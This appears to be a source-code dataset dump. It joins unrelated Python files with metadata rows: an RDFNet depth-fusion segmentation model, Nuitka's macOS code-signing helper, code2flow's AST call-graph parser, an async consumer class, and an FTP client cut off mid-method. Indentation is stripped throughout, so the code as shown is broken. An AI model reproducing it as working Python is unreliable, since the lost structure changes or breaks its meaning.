nn.BatchNorm2d(planes * block.expansion),
)
layers = []
layers.append(block(self.inplanes, planes, stride, downsample))
self.inplanes = planes * block.expansion
for i in range(1, blocks):
layers.append(block(self.inplanes, planes))
return nn.Sequential(*layers)
def forward(self, x_lr, x_hr=None):
# first set of RCU blocks
if x_hr is None:
x_lr = self.rcu1_lr(x_lr)
else:
x_hr = self.rcu1_hr(x_hr)
# fusion (or not)
x = x_lr
if x_hr is not None:
x_lr = self.mflow_conv_g1_b3_joint_varout_dimred(x_lr)
if self.fancy_upsample:
x_lr = self.upsample(x_lr, output_size=x_hr.size()) # might have to do [2:]
else:
x_lr = nn.Upsample(size=x_hr.size()[2:], mode='bilinear', align_corners=True)(x_lr)
x_hr = self.adapt_stage2_b2_joint_varout_dimred(x_hr)
x = x_lr + x_hr
x = F.relu(x)
# CRP and RCU for fusion result
x = self.mflow_conv_g1_pool(x) # CRP
x = self.rcu2(x)
out = x
return out
### added for RDFNet implementation
class MMFNet(nn.Module):
# in_channels will be 512 for MMFNet-4 and 256 for others, as per RDFNet paper
def __init__(self, in_channels):
super(MMFNet, self).__init__()
self.do = nn.Dropout(p=0.5)
# these next blocks are the same for both RGB and HHA because
# the input volumes are exactly the same dimensions (including # channels)
# conv3 is also used for the convolution before and after fusion
# pre-fusion RGB blocks
self.conv1_rgb = conv1x1(in_planes=in_channels, out_planes=in_channels)
self.RCUs_rgb = nn.Sequential( # 2 RCU blocks
BasicBlock(inplanes=in_channels, planes=in_channels), # expansion=1, no downsampling
BasicBlock(inplanes=in_channels, planes=in_channels) # expansion=1, no downsampling
)
self.conv3_rgb = conv3x3(in_planes=in_channels, out_planes=in_channels)
# pre-fusion HHA blocks
self.conv1_hha = conv1x1(in_planes=in_channels, out_planes=in_channels)
self.RCUs_hha = nn.Sequential( # 2 RCU blocks
BasicBlock(inplanes=in_channels, planes=in_channels), # expansion=1, no downsampling
BasicBlock(inplanes=in_channels, planes=in_channels) # expansion=1, no downsampling
)
self.conv3_hha = conv3x3(in_planes=in_channels, out_planes=in_channels)
# post-fusion block
#self.maxpool = nn.MaxPool2d(kernel_size=5, stride=1)
#self.conv3 = conv3x3(in_planes=in_channels, out_planes=in_channels)
self.crp = CRPBlock(in_planes=in_channels, out_planes=in_channels, n_stages=1)
def forward(self, x_rgb, x_depth):
# pre-fusion RGB
x_rgb = self.do(x_rgb)
x_rgb = self.conv1_rgb(x_rgb)
x_rgb = self.RCUs_rgb(x_rgb)
x_rgb = self.conv3_rgb(x_rgb)
# pre-fusion HHA
x_depth = self.do(x_depth)
x_depth = self.conv1_hha(x_depth)
x_depth = self.RCUs_hha(x_depth)
x_depth = self.conv3_hha(x_depth)
# fusion
x = x_rgb + x_depth
# post-fusion
x = F.relu(x)
#residual = x
#x = self.maxpool(x)
#x = self.conv3(x)
#out = x + residual
out = self.crp(x)
return out
### This module now represents the RDFNet
###
### changes and additions to the original version of this class:
### - reorganization and commenting for clarity
### - RefineNet component isolated into its own RefineNet module: see above
### - to convert from RefineNet to RDFNet:
### - depth track added (all blocks ending in "_depth")
### - MMFNet added to fuse RGB and depth tracks
class ResNet(nn.Module):
def __init__(self, block, layers, num_classes=40):#21):
super(ResNet, self).__init__()
self.do = nn.Dropout(p=0.5)
self.conv1 = nn.Conv2d(3, 64, kernel_size=7, stride=2, padding=3, bias=False)
self.conv1_depth = nn.Conv2d(3, 64, kernel_size=7, stride=2, padding=3, bias=False)
self.bn1 = nn.BatchNorm2d(64)
self.bn1_depth = nn.BatchNorm2d(64)
#self.relu = nn.ReLU(inplace=True) -- switched to F.relu to avoid errors
self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
# backbone
self.inplanes = 64
self.layer1 = self._make_layer(block, 64, layers[0])
self.layer2 = self._make_layer(block, 128, layers[1], stride=2)
self.layer3 = self._make_layer(block, 256, layers[2], stride=2)
self.layer4 = self._make_layer(block, 512, layers[3], stride=2)
self.inplanes = 64
self.layer1_depth = self._make_layer(block, 64, layers[0])
self.layer2_depth = self._make_layer(block, 128, layers[1], stride=2)
self.layer3_depth = self._make_layer(block, 256, layers[2], stride=2)
self.layer4_depth = self._make_layer(block, 512, layers[3], stride=2)
# dimensionality reduction right off the backbone
# note that for some reason, x4 uses the outl1 block, x3 uses outl2, etc
# I would like to rename these as well, but I think the names are used for some other stuff
self.p_ims1d2_outl1_dimred = conv1x1(2048, 512, bias=False) # really l4
self.p_ims1d2_outl2_dimred = conv1x1(1024, 256, bias=False) # really l3
self.p_ims1d2_outl3_dimred = conv1x1(512, 256, bias=False) # really l2
self.p_ims1d2_outl4_dimred = conv1x1(256, 256, bias=False) # really l1
self.p_ims1d2_outl1_dimred_depth = conv1x1(2048, 512, bias=False) # really l4
self.p_ims1d2_outl2_dimred_depth = conv1x1(1024, 256, bias=False) # really l3
self.p_ims1d2_outl3_dimred_depth = conv1x1(512, 256, bias=False) # really l2
self.p_ims1d2_outl4_dimred_depth = conv1x1(256, 256, bias=False) # really l1
# MMFNets
self.MMFNet_l4 = MMFNet(in_channels=512)
self.MMFNet_l3 = MMFNet(in_channels=256)
self.MMFNet_l2 = MMFNet(in_channels=256)
self.MMFNet_l1 = MMFNet(in_channels=256)
# RefineNets
self.RefineNet_l4 = RefineNet(inplanes_lr=512) # no fusion step
self.RefineNet_l4_l3 = RefineNet(inplanes_lr=512, inplanes_hr=256, fancy_upsample=True)
self.RefineNet_l3_l2 = RefineNet(inplanes_lr=256, inplanes_hr=256, fancy_upsample=True)
self.RefineNet_l2_l1 = RefineNet(inplanes_lr=256, inplanes_hr=256, fancy_upsample=True)
# CLF convolutional step applied to layer 1 output to get class predictions
self.clf_conv = nn.Conv2d(256, num_classes, kernel_size=3, stride=1,
padding=1, bias=True)
def _make_crp(self, in_planes, out_planes, stages):
layers = [CRPBlock(in_planes, out_planes,stages)]
return nn.Sequential(*layers)
def _make_layer(self, block, planes, blocks, stride=1):
downsample = None
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
nn.Conv2d(self.inplanes, planes * block.expansion,
kernel_size=1, stride=stride, bias=False),
nn.BatchNorm2d(planes * block.expansion),
)
layers = []
layers.append(block(self.inplanes, planes, stride, downsample))
self.inplanes = planes * block.expansion
for i in range(1, blocks):
layers.append(block(self.inplanes, planes))
return nn.Sequential(*layers)
def forward(self, x, x_depth):
x = self.conv1(x)
x = self.bn1(x)
x = F.relu(x)
x = self.maxpool(x)
x_depth = self.conv1_depth(x_depth)
x_depth = self.bn1_depth(x_depth)
x_depth = F.relu(x_depth)
x_depth = self.maxpool(x_depth)
# backbone
l1 = self.layer1(x)
l2 = self.layer2(l1)
l3 = self.layer3(l2)
l4 = self.layer4(l3)
l1_depth = self.layer1(x_depth)
l2_depth = self.layer2(l1_depth)
l3_depth = self.layer3(l2_depth)
l4_depth = self.layer4(l3_depth)
# not sure why this is only for l3 and l4, but it's in the original code
# so I added the same thing added for depth
l4 = self.do(l4)
l3 = self.do(l3)
l4_depth = self.do(l4_depth)
l3_depth = self.do(l3_depth)
# dimensionality reduction right off the backbone
x4 = F.relu(self.p_ims1d2_outl1_dimred(l4))
x3 = F.relu(self.p_ims1d2_outl2_dimred(l3))
x2 = F.relu(self.p_ims1d2_outl3_dimred(l2))
x1 = F.relu(self.p_ims1d2_outl4_dimred(l1))
x4_depth = F.relu(self.p_ims1d2_outl1_dimred_depth(l4_depth))
x3_depth = F.relu(self.p_ims1d2_outl2_dimred_depth(l3_depth))
x2_depth = F.relu(self.p_ims1d2_outl3_dimred_depth(l2_depth))
x1_depth = F.relu(self.p_ims1d2_outl4_dimred_depth(l1_depth))
# MMFNets
x4 = self.MMFNet_l4(x4, x4_depth)
x3 = self.MMFNet_l3(x3, x3_depth)
x2 = self.MMFNet_l2(x2, x2_depth)
x1 = self.MMFNet_l1(x1, x1_depth)
# RefineNets
x4 = self.RefineNet_l4(x4)
x3 = self.RefineNet_l4_l3(x4, x3)
x2 = self.RefineNet_l3_l2(x3, x2)
x1 = self.RefineNet_l2_l1(x2, x1)
# CLF convolutional step to x1 to get class predictions
out = self.clf_conv(x1)
return out
### new: use ImageNet pretrained weights for keys containing "_depth" as well
### might help marginally
def use_pretrained_depth_track(model_dict, pretrained_model_dict):
for key in model_dict:
if "_depth" in key:
pretrained_key = "".join(key.split("_depth"))
if pretrained_key in pretrained_model_dict:
model_dict[key] = pretrained_model_dict[pretrained_key]
### the functions below have been modified to call use_pretrained_depth_track
def rf_lw50(num_classes, imagenet=False, pretrained=True, **kwargs):
model = ResNet(Bottleneck, [3, 4, 6, 3], num_classes=num_classes, **kwargs)
if imagenet:
key = '50_imagenet'
url = models_urls[key]
pretrained_model_dict = maybe_download(key, url)
model.load_state_dict(pretrained_model_dict, strict=False)
use_pretrained_depth_track(model.state_dict(), pretrained_model_dict) ### new
elif pretrained:
dataset = data_info.get(num_classes, None)
if dataset:
bname = '50_' + dataset.lower()
key = 'rf_lw' + bname
url = models_urls[bname]
model.load_state_dict(maybe_download(key, url), strict=False)
return model
def rf_lw101(num_classes, imagenet=False, pretrained=True, **kwargs):
model = ResNet(Bottleneck, [3, 4, 23, 3], num_classes=num_classes, **kwargs)
if imagenet:
key = '101_imagenet'
url = models_urls[key]
pretrained_model_dict = maybe_download(key, url)
model.load_state_dict(pretrained_model_dict, strict=False)
use_pretrained_depth_track(model.state_dict(), pretrained_model_dict) ### new
elif pretrained:
dataset = data_info.get(num_classes, None)
if dataset:
bname = '101_' + dataset.lower()
key = 'rf_lw' + bname
url = models_urls[bname]
model.load_state_dict(maybe_download(key, url), strict=False)
return model
def rf_lw152(num_classes, imagenet=False, pretrained=True, **kwargs):
model = ResNet(Bottleneck, [3, 8, 36, 3], num_classes=num_classes, **kwargs)
if imagenet:
key = '152_imagenet'
url = models_urls[key]
pretrained_model_dict = maybe_download(key, url)
model.load_state_dict(pretrained_model_dict, strict=False)
use_pretrained_depth_track(model.state_dict(), pretrained_model_dict) ### new
elif pretrained:
dataset = data_info.get(num_classes, None)
if dataset:
bname = '152_' + dataset.lower()
key = 'rf_lw' + bname
url = models_urls[bname]
model.load_state_dict(maybe_download(key, url), strict=False)
return model
| 40.666 | 113 | 0.652584 | 2,788 | 20,333 | 4.576399 | 0.159254 | 0.020378 | 0.020064 | 0.019829 | 0.540403 | 0.510385 | 0.437495 | 0.401364 | 0.358962 | 0.323536 | 0 | 0.04087 | 0.249102 | 20,333 | 499 | 114 | 40.747495 | 0.7948 | 0.237447 | 0 | 0.388535 | 0 | 0 | 0.072987 | 0.001563 | 0 | 0 | 0 | 0 | 0 | 1 | 0.057325 | false | 0 | 0.019108 | 0 | 0.136943 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b74fa4a9ab2a861ca9dfe686f9305fef41f97bb | 2,422 | py | Python | venv/Lib/site-packages/nuitka/utils/Signing.py | patmloi/PalettePal | 66c6528a990c8bd6159fad128b2aca559f3ea0a4 | [
"MIT"
] | 5,421 | 2018-09-24T08:04:06.000Z | 2022-03-31T20:02:37.000Z | nuitka/utils/Signing.py | sthagen/Nuitka | 61ee97ebb2eef310101869a078d71e3da36e20cd | [
"Apache-2.0"
] | 1,348 | 2018-09-22T13:41:00.000Z | 2022-03-31T22:33:40.000Z | nuitka/utils/Signing.py | sthagen/Nuitka | 61ee97ebb2eef310101869a078d71e3da36e20cd | [
"Apache-2.0"
] | 396 | 2018-09-28T15:37:03.000Z | 2022-03-29T10:52:09.000Z | # Copyright 2021, Kay Hayen, mailto:kay.hayen@gmail.com
#
# Part of "Nuitka", an optimizing Python compiler that is compatible and
# integrates with CPython, but also works on its own.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
""" Signing of executables.
"""
from nuitka.Tracing import postprocessing_logger
from .Execution import executeToolChecked
from .FileOperations import withMadeWritableFileMode
_macos_codesign_usage = "The 'codesign' is used to remove invalidated signatures on macOS and required to be found."
def removeMacOSCodeSignature(filename):
"""Remove the code signature from a filename.
Args:
filename - The file to be modified.
Returns:
None
Notes:
This is macOS specific.
"""
with withMadeWritableFileMode(filename):
executeToolChecked(
logger=postprocessing_logger,
command=["codesign", "--remove-signature", "--all-architectures", filename],
absence_message=_macos_codesign_usage,
)
def addMacOSCodeSignature(filename, identity, entitlements_filename, deep):
extra_args = []
# Weak signing is supported.
if not identity:
identity = "-"
command = [
"codesign",
"-s",
identity,
"--force",
"--timestamp",
"--all-architectures",
]
# hardened runtime unless no good identify
if identity != "-":
extra_args.append("--options=runtime")
if entitlements_filename:
extra_args.append("--entitlements")
extra_args.append(entitlements_filename)
if deep:
extra_args.append("--deep")
command.append(filename)
with withMadeWritableFileMode(filename):
executeToolChecked(
logger=postprocessing_logger,
command=command,
absence_message=_macos_codesign_usage,
)
| 28.162791 | 116 | 0.668869 | 266 | 2,422 | 6.007519 | 0.5 | 0.037547 | 0.037547 | 0.020025 | 0.148936 | 0.108886 | 0.108886 | 0.108886 | 0 | 0 | 0 | 0.004388 | 0.247316 | 2,422 | 85 | 117 | 28.494118 | 0.872189 | 0.405863 | 0 | 0.216216 | 0 | 0 | 0.160377 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.054054 | false | 0 | 0.081081 | 0 | 0.135135 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b75eb422115a77ff7be5795b3c86cab8e94e70a | 8,144 | py | Python | code2flow/python.py | klaernie/code2flow | 6e76c316af2d62d54b181f9ba771a88ad671c93c | [
"MIT"
] | null | null | null | code2flow/python.py | klaernie/code2flow | 6e76c316af2d62d54b181f9ba771a88ad671c93c | [
"MIT"
] | null | null | null | code2flow/python.py | klaernie/code2flow | 6e76c316af2d62d54b181f9ba771a88ad671c93c | [
"MIT"
] | null | null | null | import ast
import logging
from .model import (OWNER_CONST, GROUP_TYPE, Group, Node, Call, Variable,
BaseLanguage, djoin)
def get_call_from_func_element(func):
"""
Given a python ast that represents a function call, clear and create our
generic Call object. Some calls have no chance at resolution (e.g. array[2](param))
so we return nothing instead.
:param func ast:
:rtype: Call|None
"""
assert type(func) in (ast.Attribute, ast.Name, ast.Subscript, ast.Call)
if type(func) == ast.Attribute:
owner_token = []
val = func.value
while True:
try:
owner_token.append(getattr(val, 'attr', val.id))
except AttributeError:
pass
val = getattr(val, 'value', None)
if not val:
break
if owner_token:
owner_token = djoin(*reversed(owner_token))
else:
owner_token = OWNER_CONST.UNKNOWN_VAR
return Call(token=func.attr, line_number=func.lineno, owner_token=owner_token)
if type(func) == ast.Name:
return Call(token=func.id, line_number=func.lineno)
if type(func) in (ast.Subscript, ast.Call):
return None
def make_calls(lines):
"""
Given a list of lines, find all calls in this list.
:param lines list[ast]:
:rtype: list[Call]
"""
calls = []
for tree in lines:
for element in ast.walk(tree):
if type(element) != ast.Call:
continue
call = get_call_from_func_element(element.func)
if call:
calls.append(call)
return calls
def process_assign(element):
"""
Given an element from the ast which is an assignment statement, return a
Variable that points_to the type of object being assigned. For now, the
points_to is a string but that is resolved later.
:param element ast:
:rtype: Variable
"""
if type(element.value) != ast.Call:
return []
call = get_call_from_func_element(element.value.func)
ret = []
for target in element.targets:
if type(target) != ast.Name:
continue
token = target.id
ret.append(Variable(token, call, element.lineno))
return ret
def process_import(element):
"""
Given an element from the ast which is an import statement, return a
Variable that points_to the module being imported. For now, the
points_to is a string but that is resolved later.
:param element ast:
:rtype: Variable
"""
ret = []
for single_import in element.names:
assert isinstance(single_import, ast.alias)
token = single_import.asname or single_import.name
rhs = single_import.name
if hasattr(element, 'module'):
rhs = djoin(element.module, rhs)
ret.append(Variable(token, points_to=rhs, line_number=element.lineno))
return ret
def make_local_variables(lines, parent):
"""
Given an ast of all the lines in a function, generate a list of
variables in that function. Variables are tokens and what they link to.
In this case, what it links to is just a string. However, that is resolved
later.
:param lines list[ast]:
:param parent Group:
:rtype: list[Variable]
"""
variables = []
for tree in lines:
for element in ast.walk(tree):
if type(element) == ast.Assign:
variables += process_assign(element)
if type(element) in (ast.Import, ast.ImportFrom):
variables += process_import(element)
if parent.group_type == GROUP_TYPE.CLASS:
variables.append(Variable('self', parent, lines[0].lineno))
variables = list(filter(None, variables))
return variables
def get_inherits(tree):
"""
Get what superclasses this class inherits
This handles exact names like 'MyClass' but skips things like 'cls' and 'mod.MyClass'
Resolving those would be difficult
:param tree ast:
:rtype: list[str]
"""
return [base.id for base in tree.bases if type(base) == ast.Name]
class Python(BaseLanguage):
@staticmethod
def assert_dependencies():
pass
@staticmethod
def get_tree(filename, _):
"""
Get the entire AST for this file
:param filename str:
:rtype: ast
"""
with open(filename) as f:
tree = ast.parse(f.read())
return tree
@staticmethod
def separate_namespaces(tree):
"""
Given an AST, recursively separate that AST into lists of ASTs for the
subgroups, nodes, and body. This is an intermediate step to allow for
clearner processing downstream
:param tree ast:
:returns: tuple of group, node, and body trees. These are processed
downstream into real Groups and Nodes.
:rtype: (list[ast], list[ast], list[ast])
"""
groups = []
nodes = []
body = []
for el in tree.body:
if type(el) == ast.FunctionDef:
nodes.append(el)
elif type(el) == ast.ClassDef:
groups.append(el)
elif getattr(el, 'body', None):
tup = Python.separate_namespaces(el)
groups += tup[0]
nodes += tup[1]
body += tup[2]
else:
body.append(el)
return groups, nodes, body
@staticmethod
def make_nodes(tree, parent):
"""
Given an ast of all the lines in a function, create the node along with the
calls and variables internal to it.
:param tree ast:
:param parent Group:
:rtype: list[Node]
"""
token = tree.name
line_number = tree.lineno
calls = make_calls(tree.body)
variables = make_local_variables(tree.body, parent)
is_constructor = False
if parent.group_type == GROUP_TYPE.CLASS and token in ['__init__', '__new__']:
is_constructor = True
import_tokens = []
if parent.group_type == GROUP_TYPE.FILE:
import_tokens = [djoin(parent.token, token)]
return [Node(token, calls, variables, parent, import_tokens=import_tokens,
line_number=line_number, is_constructor=is_constructor)]
@staticmethod
def make_root_node(lines, parent):
"""
The "root_node" is an implict node of lines which are executed in the global
scope on the file itself and not otherwise part of any function.
:param lines list[ast]:
:param parent Group:
:rtype: Node
"""
token = "(global)"
line_number = 0
calls = make_calls(lines)
variables = make_local_variables(lines, parent)
return Node(token, calls, variables, line_number=line_number, parent=parent)
@staticmethod
def make_class_group(tree, parent):
"""
Given an AST for the subgroup (a class), generate that subgroup.
In this function, we will also need to generate all of the nodes internal
to the group.
:param tree ast:
:param parent Group:
:rtype: Group
"""
assert type(tree) == ast.ClassDef
subgroup_trees, node_trees, body_trees = Python.separate_namespaces(tree)
group_type = GROUP_TYPE.CLASS
token = tree.name
display_name = 'Class'
line_number = tree.lineno
import_tokens = [djoin(parent.token, token)]
inherits = get_inherits(tree)
class_group = Group(token, group_type, display_name, import_tokens=import_tokens,
inherits=inherits, line_number=line_number, parent=parent)
for node_tree in node_trees:
class_group.add_node(Python.make_nodes(node_tree, parent=class_group)[0])
for subgroup_tree in subgroup_trees:
logging.warning("Code2flow does not support nested classes. Skipping %r in %r.",
subgroup_tree.name, parent.token)
return class_group
| 31.323077 | 92 | 0.608669 | 1,022 | 8,144 | 4.734834 | 0.219178 | 0.024799 | 0.014466 | 0.015706 | 0.243439 | 0.192188 | 0.158297 | 0.118206 | 0.086381 | 0.086381 | 0 | 0.001412 | 0.304396 | 8,144 | 259 | 93 | 31.444015 | 0.85278 | 0.276277 | 0 | 0.189781 | 0 | 0 | 0.020649 | 0 | 0 | 0 | 0 | 0 | 0.029197 | 1 | 0.087591 | false | 0.014599 | 0.109489 | 0 | 0.306569 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b7954946d0bcc033a7f4598f5114def54b6aa67 | 3,461 | py | Python | compton/consumer.py | kaelzhang/python-compton | 03c6553cc98066f3698b7ab5d5a5ceb660c8f140 | [
"MIT"
] | null | null | null | compton/consumer.py | kaelzhang/python-compton | 03c6553cc98066f3698b7ab5d5a5ceb660c8f140 | [
"MIT"
] | 1 | 2020-03-26T09:53:01.000Z | 2020-03-26T09:53:01.000Z | compton/consumer.py | kaelzhang/python-compton | 03c6553cc98066f3698b7ab5d5a5ceb660c8f140 | [
"MIT"
] | null | null | null | import logging
from abc import ABC, abstractmethod
from typing import (
List,
Optional,
Iterable
)
from .common import (
check_vector,
stringify_vector,
Payload,
Vector,
Symbol
)
class Consumer(ABC):
@staticmethod
def check(consumer) -> None:
if not isinstance(consumer, Consumer):
raise ValueError(
f'consumer must be an instance of Consumer, but got `{consumer}`' # noqa: E501
)
for vector in consumer.vectors:
check_vector(vector, consumer)
def __str__(self) -> str:
try:
vectors = stringify_vector([
stringify_vector(vector)
for vector in self.vectors
])
except Exception:
return 'consumer<invalid>'
return f'consumer{vectors}'
@property
@abstractmethod
def vectors(self) -> Iterable[Vector]: # pragma: no cover
return
@property
def all(self) -> bool:
return False
@property
def concurrency(self) -> int:
return 0
def should_process(
self,
symbol: Symbol,
*payloads: Optional[Payload]
) -> bool:
return True
@abstractmethod
async def process(
self,
symbol: Symbol,
*payloads: Optional[Payload]
) -> None: # pragma: no cover
pass
logger = logging.getLogger(__name__)
class ConsumerSentinel:
def __init__(
self,
consumer: Consumer
):
Consumer.check(consumer)
self._consumer = consumer
self._vectors = set(consumer.vectors)
self._need_all_changes = bool(consumer.all)
self._changed = {}
self._processing = 0
concurrency = consumer.concurrency
self._max_processing = int(concurrency) if concurrency else 0
@property
def vectors(self):
return self._consumer.vectors
def satisfy(self, symbol, vector) -> bool:
if self._need_all_changes:
# If the consumer requires change for every vector
if symbol in self._changed:
changed = self._changed[symbol]
else:
changed = set()
self._changed[symbol] = changed
changed.add(vector)
if changed != self._vectors:
return False
# No concurrency limit
# Or does not reach the limit
return self._max_processing == 0 \
or self._processing < self._max_processing
def process(self, symbol, payloads: List[Payload], loop):
# We need to try-catch this method,
# because it won't be raised to the outside and interrupt the program.
# Otherwise it will hard to debug
try:
if not self._consumer.should_process(symbol, *payloads):
return
except Exception as e:
logger.error('consumer should_process error: %s', e)
return
if self._need_all_changes:
# Only if we start to process, then we clear changed
self._changed[symbol].clear()
self._processing += 1
loop.create_task(self._process(symbol, payloads))
async def _process(self, symbol, payloads):
try:
await self._consumer.process(symbol, *payloads)
except Exception as e:
logger.error('consumer process error: %s', e)
self._processing -= 1
| 24.546099 | 95 | 0.583357 | 368 | 3,461 | 5.342391 | 0.309783 | 0.049847 | 0.034588 | 0.030519 | 0.139878 | 0.084435 | 0.084435 | 0 | 0 | 0 | 0 | 0.003925 | 0.337475 | 3,461 | 140 | 96 | 24.721429 | 0.853467 | 0.09477 | 0 | 0.247525 | 0 | 0 | 0.049648 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.09901 | false | 0.009901 | 0.039604 | 0.049505 | 0.267327 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b7957b89a8b599825048ab663a2ab0a235425df | 21,187 | py | Python | source/ftp_client.py | acris17/ftpsoft | 04bbf743e2c8c19bdeaacfb098b66824cd7fa6fb | [
"MIT"
] | null | null | null | source/ftp_client.py | acris17/ftpsoft | 04bbf743e2c8c19bdeaacfb098b66824cd7fa6fb | [
"MIT"
] | null | null | null | source/ftp_client.py | acris17/ftpsoft | 04bbf743e2c8c19bdeaacfb098b66824cd7fa6fb | [
"MIT"
] | null | null | null | # imports
import argparse
import os
import sys
from socket import *
# classes
class Client:
def __init__(self):
"""
goal: define class properties
type: (self) -> ()
"""
# input variables
self.userinput = ""
self.tokens = []
# socket variables
self.ftp_socket = None
self.host = ""
self.port = "21"
# login variables
self.username = ""
self.password = ""
# filesystem variables
self.client_cfg = "./ftp_client.cfg"
self.test_file = "./tests/testfile.txt"
# dataport variables
self.data_socket = None
self.data_address = ""
self.dataport_min = 60020
self.dataport_max = 61000
self.data_port = self.dataport_min
self.next_dataport = 1
self.dataport_backlog = 1
def start(self):
"""
goal: define client startup
type: (self) -> ()
"""
self.eventloop()
def eventloop(self):
"""
goal: define client eventloop
type: (self) -> ()
"""
while True:
self.userinput = menu("ftp>")
self.tokens = parser(self.userinput)
self.dispatch()
def configure(self):
"""
goal: configure client
type: (self) -> ()
"""
try:
for line in open(self.client_cfg):
tokens = parser(line)
command = tokens[0]
arglist = tokens[1:]
if command.startswith("# "):
pass
elif command == "host":
self.host = "".join(arglist)
elif command == "port":
self.port = "".join(arglist)
elif command == "data_port_max":
self.dataport_max = "".join(arglist)
elif command == "data_port_min":
self.dataport_min = "".join(arglist)
elif command == "default_ftp_port":
self.port = "".join(arglist)
elif command == "default_mode":
print("default mode = {}".format("".join(arglist)))
elif command == "default_debug_mode":
print("default debug mode = {}".format("".join(arglist)))
elif command == "default_verbose_mode":
print("default verbose mode = {}".format("".join(arglist)))
elif command == "default_test_file":
self.test_file = "".join(arglist)
elif command == "default_log_file":
print("default log file = {}".format("".join(arglist)))
except Exception as e:
print("ftp: configuration error: {}".format(e))
def arguments(self):
"""
goal: manage command line arguments
type: (self) -> ()
"""
arg_parser = argparse.ArgumentParser()
arg_parser.add_argument("-H", "--hostname", help="enter hostname")
arg_parser.add_argument("-u", "--username", help="enter username")
arg_parser.add_argument("-w", "--password", help="enter password")
arg_parser.add_argument("-fp", "--ftp_port", help="enter port")
arg_parser.add_argument("-d", "--dataport", help="enter dataport range")
arg_parser.add_argument("-c", "--config", help="enter configuration file")
arg_parser.add_argument("-t", "--test", help="enter test file")
arg_parser.add_argument("-L", "--log", help="enter log file")
arg_parser.add_argument("-D", "--debug", help="toogle debug mode", choices=["on", "off"])
arg_parser.add_argument("-P", "--passive", help="passive mode", action="store_true")
arg_parser.add_argument("-A", "--active", help="active mode", action="store_true")
arg_parser.add_argument("-V", "--verbose", help="verbose mode", action="store_true")
arg_parser.add_argument("-T", "--test_default", help="run default test", action="store_true")
arg_parser.add_argument("--all", help="all output to log file, still display", action="store_true")
arg_parser.add_argument("--lall", help="log all output to this file")
arg_parser.add_argument("--only", help="only log all output", action="store_true")
arg_parser.add_argument("--version", help="display version", action="store_true")
arg_parser.add_argument("--info", help="display client info", action="store_true")
args = arg_parser.parse_args()
if args.hostname:
self.host = args.hostname
if args.username:
self.username = args.username
if args.password:
self.password = args.password
if args.ftp_port:
self.port = args.ftp_port
if args.dataport:
self.data_port = args.dataport
if args.config:
self.client_cfg = args.config
if args.test:
print("test = {}".format(args.test))
if args.log:
print("log = {}".format(args.log))
if args.debug:
print("debug = {}".format(args.debug))
if args.passive:
print("passive = {}".format(args.passive))
if args.active:
print("active = {}".format(args.active))
if args.verbose:
print("verbose = {}".format(args.verbose))
if args.test_default:
self.test_me()
sys.exit()
if args.all:
print("all = {}".format(args.all))
if args.lall:
print("lall = {}".format(args.lall))
if args.only:
print("only = {}".format(args.only))
if args.version:
print("version: 0.1")
sys.exit()
if args.info:
print("name: Andrew Cristancho")
print("id: 2702278")
sys.exit()
def dispatch(self):
"""
goal: execute valid commands
type: (self) -> ()
"""
try:
command = self.tokens[0].lower()
arglist = self.tokens[1:]
if command in ("exit", "bye", "quit"):
if self.ftp_socket:
ftp_logout(self.ftp_socket)
self.logout()
sys.exit()
elif command in ("pwd",):
if not arglist:
ftp_pwd(self.ftp_socket)
elif command in ("noop",):
if not arglist:
ftp_noop(self.ftp_socket)
elif command in ("logout", "close"):
if not arglist:
print("Logged out", self.username)
ftp_logout(self.ftp_socket)
self.logout()
elif command in ("type",):
if not arglist:
ftp_type(self.ftp_socket)
elif command in ("list", "dir", "ls"):
if not arglist:
self.data_socket = self.dataport()
if self.data_socket:
ftp_port(self.ftp_socket, self.data_address, self.data_port)
ftp_list(self.ftp_socket, self.data_socket)
self.data_socket = None
elif command in ("cwd", "cd"):
if len(arglist) == 1:
path = arglist[0]
ftp_cwd(self.ftp_socket, path)
elif command in ("cdup",):
if not arglist:
ftp_cdup(self.ftp_socket)
elif command in ("mkd", "mkdir"):
if len(arglist) == 1:
path = arglist[0]
ftp_mkd(self.ftp_socket, path)
elif command in ("dele", "delete"):
if len(arglist) == 1:
path = arglist[0]
ftp_dele(self.ftp_socket, path)
elif command in ("rmd", "rmdir"):
if len(arglist) == 1:
path = arglist[0]
ftp_rmd(self.ftp_socket, path)
elif command in ("rn", "rename"):
if len(arglist) == 2:
path = arglist[0]
new_path = arglist[1]
ftp_rn(self.ftp_socket, path, new_path)
elif command in ("retr", "get"):
if len(arglist) == 1:
# create data socket
path = arglist[0]
self.data_socket = self.dataport()
# retrieve file
if self.data_socket:
